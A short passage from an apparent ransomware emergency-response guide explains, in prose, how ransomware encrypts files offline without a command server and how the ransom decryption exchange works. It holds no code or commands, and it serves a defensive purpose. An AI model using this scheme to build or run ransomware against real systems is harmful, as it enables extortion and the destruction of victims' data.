Ransomware Emergency Response Guide
1. Attack characteristics of ransomware
No C2 server encryption:
In the process of encrypting files, attackers generally no longer use the C2 server, which means that the current ransomware does not need to return the private key when encrypting
- Randomly generate a new encryption key pair (asymmetric public and private keys) before encryption;
- Encrypt the file using the newly generated public key;
- Use the attacker's pre-buried public key to encrypt the newly generated private key, save it in an ID file or embed it in an encrypted file.
Decryption process without C2 server encryption technology:
- Submit the encrypted private key in the ID string or encrypted file by mail or online submission (generally, the attacker will provide tools to extract the private key);
- The attacker uses the reserved private key corresponding to the embedded public key to decrypt the private key submitted by the victim;
- Deliver the decryption private key or decryption tool to the victim for decryption